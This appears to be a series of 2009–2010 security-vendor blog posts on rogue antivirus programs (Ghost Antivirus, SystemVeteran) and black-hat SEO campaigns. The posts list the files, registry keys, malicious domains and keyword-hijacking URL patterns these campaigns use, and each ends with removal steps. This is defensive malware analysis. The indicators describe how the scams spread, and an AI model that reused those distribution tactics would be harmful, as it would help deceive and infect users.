Delete all the DefendAPc files
Delete all the DefendAPc registry entries

How to remove DefendAPc (automatic removal) ?

Scan your system with NoVirusThanks Malware Remover

How to remove Ghost Antivirus (Uninstall instructions)

admin — Fri, 22 Jan 2010 00:51:00 +0000

Ghost Antivirus is a rogue security software, it is a false anti-spyware application that is generally installed in the user’s computer by dangerous trojans (such as Zlob and false video codecs), but it can also be installed manually by the victim.

Make sure to not fall in this scam, if your computer is infected with Ghost Antivirus, it is recommended to remove it immediately and to scan your system with a real security software.

Symptoms of infection

The process GhostAV.exe is running in your system
Slow computer performance
Repeated security warnings, alerts and system scans
Web sites that suddenly are shown on your desktop

Malicious web sites and urls:

Ghost-antivirus.com
Ghost-pay.com
Ghostantivirus.com
Ghostpays.com

When the program is executed, it creates the following files:

C:\Program Files\Ghost Antivirus
C:\Program Files\Ghost Antivirus\GhostAV.exe
C:\Program Files\Ghost Antivirus\register.ico
C:\Program Files\Ghost Antivirus\unins000.dat
C:\Program Files\Ghost Antivirus\uninst.ico
C:\Program Files\Ghost Antivirus\web.ico
C:\Program Files\Ghost Antivirus\working.log
C:\Program Files\Ghost Antivirus\Languages
C:\Program Files\Ghost Antivirus\lib
C:\Program Files\Ghost Antivirus\lib\ghost.sql
C:\Program Files\Ghost Antivirus\lib\Infected.wav
C:\Program Files\Ghost Antivirus\lib\listing.cfg
C:\Program Files\Ghost Antivirus\lib\version.db
C:\Program Files\Ghost Antivirus\lib\WMILib.dll
%UserProfile%\Application Data\Ghost Antivirus
%UserProfile%\Application Data\Ghost Antivirus\lib
%UserProfile%\Application Data\Ghost Antivirus\lib\links.txt
%UserProfile%\Application Data\Ghost Antivirus\lib\properties
%UserProfile%\Application Data\Ghost Antivirus\lib\times.conf
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ghost Antivirus.lnk
%AllUsers%\Desktop\Ghost Antivirus.lnk
%AllUsers%\Start Menu\Programs\Ghost Antivirus
%AllUsers%\Start Menu\Programs\Ghost Antivirus\Ghost Antivirus Home Page.lnk
%AllUsers%\Start Menu\Programs\Ghost Antivirus\Ghost Antivirus.lnk
%AllUsers%\Start Menu\Programs\Ghost Antivirus\Purchase License.lnk

The program creates the following registry entries:

1
2
3

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ghost Antivirus_is1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Ghost Antivirus

How to remove Ghost Antivirus (manual removal) ?

Terminate all the Ghost Antivirus processes
Unregister all the Ghost Antivirus DLLs
Delete all the Ghost Antivirus files
Delete all the Ghost Antivirus registry entries

How to remove Ghost Antivirus (automatic removal) ?

Scan your system with NoVirusThanks Malware Remover

More than 100 websites compromised for Blackhat SEO strategy

admin — Sat, 14 Nov 2009 00:27:11 +0000

We have noticed a new case of blackhat SEO used by cybercriminals to distribute their backdoors and to gain as many victims as possible, by driving specific users traffic (by hijacking keywords in search engines) to malicious websites that contains hidden iframes, evil javascript codes, and other sorts of malicious code, that redirect the users to other dangerous websites that distribute rogue software and trojans.

Rogue security software distributors have recently started a campaign to hijack traffic that come from keywords related to an anime/cartoon named Bleach in particular to the episode number 244. In our analysis we have found more than 100 websites compromised with scripts that capture the keywords of the users and then redirect the users to rogue software websites, or to other websites that distribute trojans as false video codecs. Users are also redirected to pages that display a false scan of their computer, stating that the user has an infected computer and that they need a special program to delete the infections.

This program that is distributed by these malicious websites is in reality a false antivirus that other than installing a completely false security program, it also installs other backdoors that can steal important and private data from the victim’s computer.

Below there are some screenshots of malicious webpages that we have encountered during the analysis, that display false pages that state our computer is infected by viruses, or that offer the download of false video codecs:

Some websites were infected by evil javascript codes that were redirecting users to other malicious websites that could install various trojans and rootkits on the user’s computer. We have decrypted some javascript codes and this is where the scripts were redirecting the unfortunate users:

The above malicious websites contain other redirections to other websites that distribute rogue software named Antivirus 2010, SystemVeteran and Internet Antivirus Pro that are all false security software. There are also hidden iframes that redirect the users to another very dangerous websites that exploit various vulnerabilities of web applications and web browsers installing trojans and rootkits in the user’s computer.

Most compromised websites, if visited a second time by the victim without the referer of a search engine then there is a script that changes the “Location: ” of the http headers to the CNN.com website and the users are redirected to the legit website of CNN:

The structure of the links of the malicious websites that hijacks the keywords in the search engines is as follows:

/?q=keyword
/?page=keyword
/ssl.php?t=keyword
/index.php?a=keyword
/dfd/index.php?a=keyword
/rew/index.php?a=keyword
/gtr/index.php?a=keyword
/gde/index.php?a=keyword
/?clo=keyword
/?t=keyword
/in.php?t=keyword
/logon.php?page=keyword
/log.php?page=keyword
/images/?page=keyword
/?kkk=keyword
/mxbb/?kkk=keyword
/?topic=keyword
/faq.php?t=keyword
/seed.php?keyword
/shop/images/?t=keyword
/shop/images/?page=keyword
/shop/images/?a=keyword
/shipping.php?p=keyword
/?tost=keyword

Blackhat SEO used to spread SystemVeteran Rogue Software

admin — Sat, 07 Nov 2009 02:59:15 +0000

Strategies used by cyber criminals to spread rogue software and other dangerous threats such as ZeUs Trojan or Zlob are always more oriented to web-based-spreading using Blackhat SEO and Social Engineering to let the user download and install the malicious executable file.

The most used method is to create a webpage, generally with pornographic content, that displays a fake image of a video and warn the user that to play and watch the video is needed the download and installation of a special codec or a false adobe player.

This is the case of the malicious website named get2(dot)tv that is using a massive comments spam strategy to promote the download of a false video codec letting the user think it is Adobe Flash Player and that its installation is needed to watch the fake video. The malicious website spammed its url with false queries, mostly oriented to porn or adult text, and used Blackhat SEO strategies to be sure to get more visitors and possibly more victims.

If we click on the link to download the false codec we receive a request to install a file named setup.exe but it is not downloaded from get2(dot)tv but from another malicious site named szickfrost.com that hosts the infected file:

File Name:	setup_exe
File Size:	53295 bytes
MD5 Hash:	b005bee770d23120f0bdc571865536ca
SHA1 Hash:	334A9E2DCABB62C97A6BA94F905F75827CA9F4B0
Detection Rate:	3 on 18 (16.66%)
Status:	        INFECTED

When the downloaded file is executed, it connects to another malicious website named systemveteran(dot)com to download two new executable files in the temp folder that are immediately executed:

From the first image of the program, that is being installed by the false video codec file setup.exe, we can see that it looks like a rogue security software named SystemVeteran and has already detected 46 so-called infections in our system:

The funny part of this rogue security software is that it dropped in our system folders more than 100 files, with random name, that are then detected by SystemVeteran during the scanning process. Basically this program, when installed, drop a lot of infected files in our system folders so the user know that the files exists in the system and then it alert the user that his computer has been infected by thousands of malicious threats:

While SystemVeteran is running it displays security alerts on your desktop stating that your computer is under attack or that active malware has been detected. These alerts are just another tactic where they are trying to convince you that your computer has a problem and should be ignored. SystemVeteran purposely uses fake security alerts and false scan results as a method to scare you into purchasing the software.

When the program is executed, it creates the following files:

%ProgramFiles%\SystemVeteran Software
%ProgramFiles%\SystemVeteran Software\SystemVeteran
%ProgramFiles%\SystemVeteran Software\SystemVeteran\SystemVeteran.exe
%User%\Desktop\SystemVeteran.lnk
%User%\Start Menu\Programs\SystemVeteran.lnk
%ProgramFiles%\SystemVeteran Software\SystemVeteran\Uninstall.exe
C:\WINDOWS\system32\4fz9threat225425.ocx
C:\WINDOWS\system32\28725not-z-vi9u5491.exe
C:\WINDOWS\10b4spywar5191z.exe
C:\WINDOWS\system32\6791not-azv5rus464.ocx
C:\WINDOWS\system32\5479t5ojz5f.cpl
C:\WINDOWS\system32\958edownloazer1459.cpl
C:\WINDOWS\5df159r2637z.cpl
C:\WINDOWS\7245t9iefz269.cpl
C:\WINDOWS\1906not9a-vizu5165.exe
C:\WINDOWS\z2099orm55.exe

The program creates the following registry entries:

1
2
3

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemVeteran
HKLM\SOFTWARE\SystemVeteran
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemVeteran

Note that when installed, this program will be configured to start automatically when you load Windows by adding the registry value named SystemVeteran in the Run key.

How to remove SystemVeteran ?

Scan your system with NoVirusThanks Malware Remover